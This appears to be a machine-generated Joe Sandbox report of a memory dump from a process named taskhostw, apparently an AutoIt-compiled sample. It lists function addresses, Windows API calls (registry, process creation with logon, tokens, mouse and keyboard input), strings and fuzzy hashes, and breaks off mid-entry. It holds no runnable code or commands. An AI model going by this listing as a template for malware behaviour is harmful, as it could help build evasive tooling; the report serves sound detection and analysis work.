Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: eb6db3def6d2ab5a7e14d0ed23928e8a9d4edcefb93baa2e069bc8d988219623
Instruction ID: b4f0d908d4ea737bb0ce2803cff0cf0e96e150e8106f7a796c58ea02ecd90462
Opcode Fuzzy Hash: eb6db3def6d2ab5a7e14d0ed23928e8a9d4edcefb93baa2e069bc8d988219623
Instruction Fuzzy Hash: FDE0B6B0581310EFEB20AB65EC0DF543AA8FB14B82F944124F115E12B0EFB64684EB34

Function 00D56561 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D566B4
_memmove.LIBCMT ref: 00D565EF

Part of subcall function 00CF9997: __itow.LIBCMT ref: 00CF99C2
Part of subcall function 00CF9997: __swprintf.LIBCMT ref: 00CF9A0C

_memmove.LIBCMT ref: 00D56662
_memmove.LIBCMT ref: 00D56749
_memmove.LIBCMT ref: 00D56762
_memmove.LIBCMT ref: 00D5677E

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 63689a82d2642594268ab84c242c06be0a643f1324325571bb712fe7ee854062
Instruction ID: 9edefefae33f8cc25e0916ecc8ecf2eaf588f3f5a91c7833da6bb502d799a0d9
Opcode Fuzzy Hash: 63689a82d2642594268ab84c242c06be0a643f1324325571bb712fe7ee854062
Instruction Fuzzy Hash: B861AC3050065AABCF11EF20D882EFE3BA4EF49308F444558FD595B192DB74E94ADBB2

Function 02AE4168 Relevance: 9.2, APIs: 6, Instructions: 170COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 02AE4201

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 33cd0ae8853705823ff7dd7a1eda622cdde04badbdf09edc531c5b295a380b95
Instruction ID: 6ba2f327dcf30799ac23a7b134c412b4dc0cea4fb1b76fa19f87699bf83772a7
Opcode Fuzzy Hash: 33cd0ae8853705823ff7dd7a1eda622cdde04badbdf09edc531c5b295a380b95
Instruction Fuzzy Hash: D95156B20483459BCB25EB94DD809DFB3EDAF89300F00496EE586D3151EF34A18DCB66

Function 00D7026F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF7F41: _memmove.LIBCMT ref: 00CF7F82

Part of subcall function 00D70EA5: CharUpperBuffW.USER32(?,?), ref: 00D70EBC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D70348
RegOpenKeyExW.ADVAPI32 ref: 00D70388
RegCloseKey.ADVAPI32(?), ref: 00D703AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00D703D4
RegCloseKey.ADVAPI32(?), ref: 00D70417
RegCloseKey.ADVAPI32(00000000), ref: 00D70424

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: f799cf684aa791c83ba998cd15241cd1b765cbce48f40c1eb75d19eb77aeb68d
Instruction ID: 93e2d6de137ed51c1187f6e9374f1da648c67d26e614099da09ecc5557545088
Opcode Fuzzy Hash: f799cf684aa791c83ba998cd15241cd1b765cbce48f40c1eb75d19eb77aeb68d
Instruction Fuzzy Hash: 4B513A31108204EFC714EF54D885E6EBBE8FF88314F04891DF689872A1EB71E945DB62

Function 00D4F1FE Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D4F218
VariantClear.OLEAUT32(00000013), ref: 00D4F28A
VariantClear.OLEAUT32(00000000), ref: 00D4F2E5
_memmove.LIBCMT ref: 00D4F30F
VariantClear.OLEAUT32(?), ref: 00D4F35C
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D4F38A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 224e9d9290d8218ad03c7d5f0dea4a4c9a28d4d158a79ae6c790e38daff94174
Instruction ID: ef70d03697e017f5a3686221efd143c8c9ec3971f00288b7d2701c7a36b243c0
Opcode Fuzzy Hash: 224e9d9290d8218ad03c7d5f0dea4a4c9a28d4d158a79ae6c790e38daff94174
Instruction Fuzzy Hash: FE5128B5A00209EFDB24CF58C884AAAB7B8FF4C314B158569E959DB315E730E951CFA0

Function 02A88D97 Relevance: 9.1, APIs: 6, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 02A88DC2
__swprintf.LIBCMT ref: 02A88E0C
__i64tow.LIBCMT ref: 02ABED3F

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID:
API String ID: 421087845-0
Opcode ID: 39ac969a5d36b17aba07e8c64723978f0bb42c4465549b3cb08dc9d925fed958
Instruction ID: 727e3a41e23582cf6bbe936004ee16dbc8d3a4462ea547c61223e2a3482258cb
Opcode Fuzzy Hash: 39ac969a5d36b17aba07e8c64723978f0bb42c4465549b3cb08dc9d925fed958
Instruction Fuzzy Hash: F64104715443099FEB25AB34DE81BBAB7F9EF04304FA048AED949D7281EF359841CB61

Function 00D52502 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D52550
GetMenuItemInfoW.USER32 ref: 00D5259B
IsMenu.USER32(00000000), ref: 00D525BB
CreatePopupMenu.USER32 ref: 00D525EF
GetMenuItemCount.USER32(000000FF), ref: 00D5264D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00D5267E

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 1c69e2a9e50cb9ef6bbc20c606c9bff61d957666e184680a215fe735d4dd0f40
Instruction ID: 1ba52338d41aab99dd67b144145bdc4f81640611dde7d9e75b20dfffa6f265b8
Opcode Fuzzy Hash: 1c69e2a9e50cb9ef6bbc20c606c9bff61d957666e184680a215fe735d4dd0f40
Instruction Fuzzy Hash: 62517C70A00249EBDF24CF68D888ABEBBF4EF56316F184159EC5597290EB70994CCB71

Function 02AE4AA4 Relevance: 9.1, APIs: 6, Instructions: 138COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 02AE4AE6
_wcsncpy.LIBCMT ref: 02AE4B18
_wcsncpy.LIBCMT ref: 02AE4B4B
_wcsncpy.LIBCMT ref: 02AE4B8D
_wcsncpy.LIBCMT ref: 02AE4BC7
_wcsncpy.LIBCMT ref: 02AE4BF6

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _wcsncpy
String ID:
API String ID: 1735881322-0
Opcode ID: bff410fd89d59ec60ffbbd26d3f957a73104d33eefce5dacdf7aeb7e05c75cea
Instruction ID: 3b46988538be6165cdac2dc08a2af88ccacd092b5bcf67de4c4b7a69665cab88
Opcode Fuzzy Hash: bff410fd89d59ec60ffbbd26d3f957a73104d33eefce5dacdf7aeb7e05c75cea
Instruction Fuzzy Hash: F041A275C5121476CB11EBF58C45ADFB3BD9F49310F108866EA09E3220EF34A656CBE5

Function 00D671B3 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00D671C1

Part of subcall function 00D63AB6: GetWindowRect.USER32(?,?), ref: 00D63AC9

GetDesktopWindow.USER32 ref: 00D671EB
GetWindowRect.USER32(00000000), ref: 00D671F2
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00D67224

Part of subcall function 00D552EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D55363

GetCursorPos.USER32(?), ref: 00D67250
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00D672AE

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: eebecb4575dfe4d2218c210df0543ba29d6e4d3bbded45b4c3b7d53384ce7147
Instruction ID: 2d2cddf14c6b933af1ae1f9d6a9f9698b837ccdd3c1693f61307a1607a1dfdce
Opcode Fuzzy Hash: eebecb4575dfe4d2218c210df0543ba29d6e4d3bbded45b4c3b7d53384ce7147
Instruction Fuzzy Hash: 2131D272109309ABD720DF14C849B9BB7A9FF88314F000919F989D7291DB30EA48CBB6

Function 00D48B3B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D483D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D483E8
Part of subcall function 00D483D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D483F2
Part of subcall function 00D483D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D48401
Part of subcall function 00D483D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D48408
Part of subcall function 00D483D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D4841E

GetLengthSid.ADVAPI32(?,00000000,00D48757), ref: 00D48B8C
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D48B98
HeapAlloc.KERNEL32(00000000), ref: 00D48B9F
CopySid.ADVAPI32(00000000,00000000,?), ref: 00D48BB8
GetProcessHeap.KERNEL32(00000000,00000000,00D48757), ref: 00D48BCC
HeapFree.KERNEL32(00000000), ref: 00D48BD3

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 32aba3c549ffb7fce9acdfffaa24abec064cd7046e9bd18191009db4b11bb867
Instruction ID: 2f4753b1c06b6cf030a7ae3c118d552c0b87d8a1280f2bf96456a7669f05ee28
Opcode Fuzzy Hash: 32aba3c549ffb7fce9acdfffaa24abec064cd7046e9bd18191009db4b11bb867
Instruction Fuzzy Hash: C9118EB1501305FFDB609FA4CC09FAE7BA8FB45395F148169E889D7250EB329A44EB70

Function 00D488D9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D4890A
OpenProcessToken.ADVAPI32(00000000), ref: 00D48911
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D48920
CloseHandle.KERNEL32(00000004), ref: 00D4892B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D4895A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00D4896E

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 14fc5ab2f7ce489d8b8f5e36266017d148b3382e43000cd2ed936f98fdb9a2c5
Instruction ID: a32bd6d5f8428889661e34a9f823cdb1bf51fd9875c376d259375e934254b7ae
Opcode Fuzzy Hash: 14fc5ab2f7ce489d8b8f5e36266017d148b3382e43000cd2ed936f98fdb9a2c5
Instruction Fuzzy Hash: 52115C72500209ABDF118FA4ED49BEE7BA9FF09348F084064FE05E2260D7718DA1AB71

Function 00D102E2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D10313
MapVirtualKeyW.USER32(00000010,00000000), ref: 00D1031B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D10326
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D10331
MapVirtualKeyW.USER32(00000011,00000000), ref: 00D10339
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D10341

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: e92323d9bb160070d838da3e07a698595bb5a281a687c5ad37f3a33f4b5e7a4d
Instruction ID: 3a5303c501e697eea6b68acea6f17d01f9738a2bcd3b62e4233a15aea7b9e8e5
Opcode Fuzzy Hash: e92323d9bb160070d838da3e07a698595bb5a281a687c5ad37f3a33f4b5e7a4d
Instruction Fuzzy Hash: 06016CB09017597DE3008F5A8C85B56FFA8FF19354F00411BA15C87A41C7F5A864CBE5

Function 00D572D9 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?,?,?,?,00D36096,?,?,?,?,00D01044,?,?), ref: 00D572EC
EnterCriticalSection.KERNEL32(?,?,00D01044,?,?), ref: 00D572FD
TerminateThread.KERNEL32(00000000,000001F6,?,00D01044,?,?), ref: 00D5730A
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00D01044,?,?), ref: 00D57317

Part of subcall function 00D56CDE: CloseHandle.KERNEL32(00000000), ref: 00D56CE8

InterlockedExchange.KERNEL32(?,000001F6,?,00D01044,?,?), ref: 00D5732A
LeaveCriticalSection.KERNEL32(?,?,00D01044,?,?), ref: 00D57331

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 1229892805aa482ef8153b3956ca38f95e0fb66160c7da6698f85e1352c6c67d
Instruction ID: cf33813bef452250b7ba6bf3a3097665accc72f9b1e801b0b283169a2ea66ec3
Opcode Fuzzy Hash: 1229892805aa482ef8153b3956ca38f95e0fb66160c7da6698f85e1352c6c67d
Instruction Fuzzy Hash: 1FF0BE36044312EBEB211B24ED8C9DA3B3AFF09312B100131FA06D11B1EF715880CBB0

Function 00D48C54 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D48C5F
UnloadUserProfile.USERENV(?,?), ref: 00D48C6B
CloseHandle.KERNEL32(?), ref: 00D48C74
CloseHandle.KERNEL32(?), ref: 00D48C7C
GetProcessHeap.KERNEL32(00000000,?), ref: 00D48C85
HeapFree.KERNEL32(00000000), ref: 00D48C8C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 5749d01d05ec7f5731dc004d00796ce35b31007b95f1efc222b29157d16e2c85
Instruction ID: a81ce7ef589f3a3fa02c902e8b1116529725220d3dbc59aadbbedbb915cf1a6b
Opcode Fuzzy Hash: 5749d01d05ec7f5731dc004d00796ce35b31007b95f1efc222b29157d16e2c85
Instruction Fuzzy Hash: 06E0C236004201FBDA111FF1EC0D90ABB69FB99322B508230F61DC2670EB32A4A1DB70

Function 00D68702 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D68728
CharUpperBuffW.USER32(?,?), ref: 00D68837
VariantClear.OLEAUT32(?), ref: 00D689AF

Part of subcall function 00D5760B: VariantInit.OLEAUT32(00000000), ref: 00D5764B
Part of subcall function 00D5760B: VariantCopy.OLEAUT32(00000000,?), ref: 00D57654
Part of subcall function 00D5760B: VariantClear.OLEAUT32(00000000), ref: 00D57660

Strings

AUTOIT.ERROR, xrefs: 00D6883D
Incorrect Parameter format, xrefs: 00D68760, 00D68922

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 8aa458683a6ac77063d86fb2628d5198086d9ac2a2e20933e9dffae0369930d4
Instruction ID: 7fb4e6d1da7a68cfdcc05fabb92810dfc2a9262dbd60f98bb83c4273f584f385
Opcode Fuzzy Hash: 8aa458683a6ac77063d86fb2628d5198086d9ac2a2e20933e9dffae0369930d4
Instruction Fuzzy Hash: 42918075604305DFCB10DF24C48096ABBF4EF89354F148A6EF98A8B361DB31E949DB62

Function 00D52A4B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D52AB8
GetMenuItemInfoW.USER32 ref: 00D52AD4
DeleteMenu.USER32 ref: 00D52B1A
DeleteMenu.USER32 ref: 00D52B63

Strings

0, xrefs: 00D52AAD

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: fe94a29f7399cb38629295779c4c8433f9ac27bfd2e80f92fa83c94bee551408
Instruction ID: 2fc493225fbbcce11c6848b77fea421495858aa37f004b340fbdb0116f8359dd
Opcode Fuzzy Hash: fe94a29f7399cb38629295779c4c8433f9ac27bfd2e80f92fa83c94bee551408
Instruction Fuzzy Hash: 2C418F702043029FDB20DF24C885B2AB7E9EB86321F14465EFDA597295D770E90CCB72

Function 00D49152 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF7F41: _memmove.LIBCMT ref: 00CF7F82

Part of subcall function 00D4AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00D4AEC7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D491D6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D491E9
SendMessageW.USER32(?,00000189,?,00000000), ref: 00D49219

Part of subcall function 00CF7D2C: _memmove.LIBCMT ref: 00CF7D66

Strings

ComboBox, xrefs: 00D49160
ListBox, xrefs: 00D49195

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: cc024aa763d54c7e05388fa4d85cbfc6f850cc54a1e8ca2a01369b71711cdd97
Instruction ID: 58cc3735b4e211e24bbca81ac47ec1adc5785e7e350e8239c7e56dc15fd8d4df
Opcode Fuzzy Hash: cc024aa763d54c7e05388fa4d85cbfc6f850cc54a1e8ca2a01369b71711cdd97
Instruction Fuzzy Hash: 1D210471A002087FDB24AB75DC968FFB778DF45360B544229F525A72E0DB784D4A9A30

Function 00D76419 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF1D35: CreateWindowExW.USER32 ref: 00CF1D73
Part of subcall function 00CF1D35: GetStockObject.GDI32(00000011), ref: 00CF1D87
Part of subcall function 00CF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CF1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00D76493
LoadLibraryW.KERNEL32(?), ref: 00D7649A
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00D764AF
DestroyWindow.USER32 ref: 00D764B7

Strings

SysAnimate32, xrefs: 00D7646E

Memory Dump Source

